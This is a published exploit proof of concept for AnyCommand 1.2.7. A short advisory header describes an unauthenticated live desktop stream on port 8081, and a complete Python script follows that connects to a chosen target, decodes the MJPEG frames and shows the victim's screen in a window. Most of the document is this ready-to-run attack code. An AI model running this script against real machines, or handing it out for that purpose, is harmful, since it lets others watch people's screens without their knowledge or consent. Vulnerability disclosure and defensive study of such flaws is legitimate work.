# Exploit Title: AnyCommand 1.2.7 - Unauthenticated Live Desktop Stream
Access
# Date: 30/06/25
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://anycommand.io/
# Software Link:
https://app.esigner.com/files/AnyCommandSetup/WSY-DLo0g/download
# Version: 1.2.7
# Tested on: Windows 10

'''
Description:
AnyCommand 1.2.7 exposes a live MJPEG screen stream at
http://<target>:8081/stream
without access control. Unauthenticated attackers can directly access and
view the victim’s live screen feed without triggering any prompts or
requiring a valid session.

POC note:
go to the browser, navigate to http://192.168.8.101:8081/
the full screen desktop stream will be exposed.
'''

import argparse
import requests
import time
import re
import cv2
import numpy as np

def fetch_screen_stream(host):
    timestamp_ms = int(time.time() * 1000)
    stream_url = f"http://{host}:8081/stream?t={timestamp_ms}"
    headers = {
        "User-Agent": "Mozilla/5.0",
        "Accept": "image/*,*/*;q=0.8",
        "Referer": f"http://{host}:8081/"
    }

    try:
        print("[*] Connecting to unauthenticated stream...")
        response = requests.get(stream_url, headers=headers, stream=True,
timeout=10)
        if "multipart/x-mixed-replace" not in
response.headers.get("Content-Type", ""):
            print("[-] Stream is not MJPEG. Aborting.")
            return False

        print("[+] Stream connected. Rendering frames... Press 'q' to
quit.")
        boundary = b"--frame"
        buffer = b""

        for chunk in response.iter_content(chunk_size=1024):
            buffer += chunk
            while boundary in buffer:
                part, buffer = buffer.split(boundary, 1)
                match = re.search(b'\r\n\r\n(.*)', part, re.DOTALL)
                if match:
                    jpg_data = match.group(1)
                    try:
                        img_array = np.frombuffer(jpg_data, dtype=np.uint8)
                        frame = cv2.imdecode(img_array, cv2.IMREAD_COLOR)
                        if frame is not None:
                            cv2.imshow("Live Desktop View", frame)
                            if cv2.waitKey(1) & 0xFF == ord('q'):
                                cv2.destroyAllWindows()
                                return True
                    except:
                        continue
    except KeyboardInterrupt:
        print("\n[!] Interrupted.")
        cv2.destroyAllWindows()
    except Exception as e:
        print(f"[!] Error: {e}")
        return False
    return True

def main():
    parser = argparse.ArgumentParser(description='AnyCommand 1.2.7
Unauthenticated Live Desktop Stream Access')
    parser.add_argument('--host', required=True, help='Target IP address')
    args = parser.parse_args()

    if not fetch_screen_stream(args.host):
        print("[-] Could not connect to screen stream")
    else:
        print("[+] Stream ended or window closed.")

if __name__ == "__main__":
    main()